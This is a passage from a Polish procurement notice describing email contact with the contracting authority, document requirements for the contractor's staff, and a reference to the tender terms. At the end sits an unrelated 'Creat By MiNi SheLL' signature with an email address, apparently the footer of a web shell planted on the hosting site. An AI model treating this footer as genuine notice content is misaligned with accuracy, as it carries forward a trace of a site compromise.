komunikację Wykonawcy i Zamawiającego poprzez ten System, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres: 32bltprz@ron.mil.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu). Zaleca się aby w korespondencji kierowanej do Zamawiającego za pomocą poczty elektronicznej Wykonawca posługiwał się nazwą i numerem postępowania.<br/>11.Najpóźniej przed podpisaniem umowy Wykonawca obowiązany jest dostarczyć Zamawiającemu w wersji elektronicznej dokumenty potwierdzające wszystkie wskazane przez Wykonawcę uprawnienia osób wskazanych w wykazie osób celem weryfikacji i potwierdzenia ich autentyczności i prawidłowości (w zakresie odpowiedniej części zamówienia).<br/>12. Pozostałe informacje na temat postępowania zawiera SWZ wraz z załącznikami.

Creat By MiNi SheLL
Email: jattceo@gmail.com